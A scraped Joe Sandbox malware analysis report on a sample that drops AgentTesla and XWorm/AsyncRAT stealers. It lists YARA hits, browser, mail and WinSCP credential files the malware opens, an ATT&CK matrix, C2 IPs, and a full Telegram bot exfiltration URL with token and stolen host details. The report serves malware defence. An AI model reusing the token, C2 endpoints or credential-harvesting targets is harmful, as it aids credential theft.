                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                        Stealing of Sensitive Information

                                        barindex
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: dump.pcap, type: PCAP
                                        Source: Yara matchFile source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
                                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED

                                        Remote Access Functionality

                                        barindex
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: dump.pcap, type: PCAP
                                        Source: Yara matchFile source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
                                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
                                        Source: Yara matchFile source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED
                                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                                        Windows Management Instrumentation
                                        1
                                        DLL Side-Loading
                                        1
                                        DLL Side-Loading
                                        1
                                        Disable or Modify Tools
                                        2
                                        OS Credential Dumping
                                        1
                                        File and Directory Discovery
                                        Remote Services11
                                        Archive Collected Data
                                        1
                                        Web Service
                                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                                        Process Injection
                                        1
                                        Deobfuscate/Decode Files or Information
                                        1
                                        Input Capture
                                        25
                                        System Information Discovery
                                        Remote Desktop Protocol2
                                        Data from Local System
                                        1
                                        Ingress Tool Transfer
                                        Exfiltration Over BluetoothNetwork Denial of Service
                                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                                        Obfuscated Files or Information
                                        1
                                        Credentials in Registry
                                        1
                                        Query Registry
                                        SMB/Windows Admin Shares1
                                        Email Collection
                                        11
                                        Encrypted Channel
                                        Automated ExfiltrationData Encrypted for Impact
                                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                                        Software Packing
                                        NTDS331
                                        Security Software Discovery
                                        Distributed Component Object Model1
                                        Input Capture
                                        1
                                        Non-Standard Port
                                        Traffic DuplicationData Destruction
                                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                        DLL Side-Loading
                                        LSA Secrets1
                                        Process Discovery
                                        SSH1
                                        Clipboard Data
                                        2
                                        Non-Application Layer Protocol
                                        Scheduled TransferData Encrypted for Impact
                                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts241
                                        Virtualization/Sandbox Evasion
                                        Cached Domain Credentials241
                                        Virtualization/Sandbox Evasion
                                        VNCGUI Input Capture123
                                        Application Layer Protocol
                                        Data Transfer Size LimitsService Stop
                                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                        Process Injection
                                        DCSync1
                                        Application Window Discovery
                                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                                        System Network Configuration Discovery
                                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                        Hide Legend

                                        Legend:

                                        • Process
                                        • Signature
                                        • Created File
                                        • DNS/IP Info
                                        • Is Dropped
                                        • Is Windows Process
                                        • Number of created Registry Values
                                        • Number of created Files
                                        • Visual Basic
                                        • Delphi
                                        • Java
                                        • .Net C# or VB.NET
                                        • C, C++ or other language
                                        • Is malicious
                                        • Internet
                                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562433 Sample: DJ5PhUwOsM.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 20 api.telegram.org 2->20 22 api.ipify.org 2->22 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 40 14 other signatures 2->40 7 DJ5PhUwOsM.exe 1 5 2->7         started        signatures3 38 Uses the Telegram API (likely for C&C communication) 20->38 process4 file5 16 C:\Users\user\AppData\...\FB_7D21.tmp.exe, PE32 7->16 dropped 18 C:\Users\user\AppData\...\FB_7BD8.tmp.exe, PE32 7->18 dropped 10 FB_7BD8.tmp.exe 15 2 7->10         started        14 FB_7D21.tmp.exe 14 2 7->14         started        process6 dnsIp7 24 162.254.34.31, 49705, 587 VIVIDHOSTINGUS United States 10->24 26 api.ipify.org 104.26.13.205, 443, 49704 CLOUDFLARENETUS United States 10->26 42 Antivirus detection for dropped file 10->42 44 Multi AV Scanner detection for dropped file 10->44 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 10->46 54 4 other signatures 10->54 28 89.40.31.232, 1717, 49707, 49753 TELEMEDIA-ASRO Romania 14->28 30 api.telegram.org 149.154.167.220, 443, 49706 TELEGRAMRU United Kingdom 14->30 48 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->48 50 Protects its processes via BreakOnTermination flag 14->50 52 Machine Learning detection for dropped file 14->52 signatures8

                                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                        windows-stand
                                        SourceDetectionScannerLabelLink
                                        DJ5PhUwOsM.exe92%ReversingLabsWin32.Backdoor.Fynloski
                                        DJ5PhUwOsM.exe100%AviraTR/Spy.Gen8
                                        DJ5PhUwOsM.exe100%Joe Sandbox ML
                                        SourceDetectionScannerLabelLink
                                        C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe100%AviraTR/Spy.Gen
                                        C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe100%AviraTR/Spy.Gen8
                                        C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe100%Joe Sandbox ML
                                        C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe100%Joe Sandbox ML
                                        C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe88%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                                        C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                        No Antivirus matches
                                        No Antivirus matches
                                        SourceDetectionScannerLabelLink
                                        89.40.31.2320%Avira URL Cloudsafe
                                        NameIPActiveMaliciousAntivirus DetectionReputation
                                        api.ipify.org
                                        104.26.13.205
                                        truefalse
                                          high
                                          api.telegram.org
                                          149.154.167.220
                                          truefalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://api.ipify.org/false
                                              high
                                              89.40.31.232true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024false
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://api.ipify.orgDJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.drfalse
                                                  high
                                                  https://account.dyn.com/DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.drfalse
                                                    high
                                                    https://api.ipify.org/tFB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/botDJ5PhUwOsM.exe, FB_7D21.tmp.exe.0.drfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://microsoft.coFB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            149.154.167.220
                                                            api.telegram.orgUnited Kingdom
                                                            62041TELEGRAMRUfalse
                                                            89.40.31.232
                                                            unknownRomania
                                                            35512TELEMEDIA-ASROtrue
                                                            104.26.13.205
                                                            api.ipify.orgUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            162.254.34.31
                                                            unknownUnited States
                                                            64200VIVIDHOSTINGUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1562433
                                                            Start date and time:2024-11-25 15:35:24 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 49s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:6
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:DJ5PhUwOsM.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@5/2@2/4
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 56
                                                            • Number of non-executed functions: 11
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • VT rate limit hit for: DJ5PhUwOsM.exe
                                                            TimeTypeDescription
                                                            09:36:20API Interceptor40x Sleep call for process: FB_7BD8.tmp.exe modified
                                                            09:36:35API Interceptor12988843x Sleep call for process: FB_7D21.tmp.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            149.154.167.2202ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                              Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                  Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                    MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                89.40.31.232Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                • 89.40.31.232/12/index.php
                                                                                No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                • 89.40.31.232/12/index.php
                                                                                104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                • api.ipify.org/
                                                                                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/
                                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                • api.ipify.org/
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api.ipify.orgRef#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                • 104.26.13.205
                                                                                PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                • 104.26.13.205
                                                                                CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 104.26.12.205
                                                                                New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                https://linktr.ee/priyanka662Get hashmaliciousGabagoolBrowse
                                                                                • 172.67.74.152
                                                                                mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.74.152
                                                                                zapret.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.26.13.205
                                                                                313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.26.13.205
                                                                                unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                • 104.26.13.205
                                                                                api.telegram.org2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                • 149.154.167.220
                                                                                MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 149.154.167.220
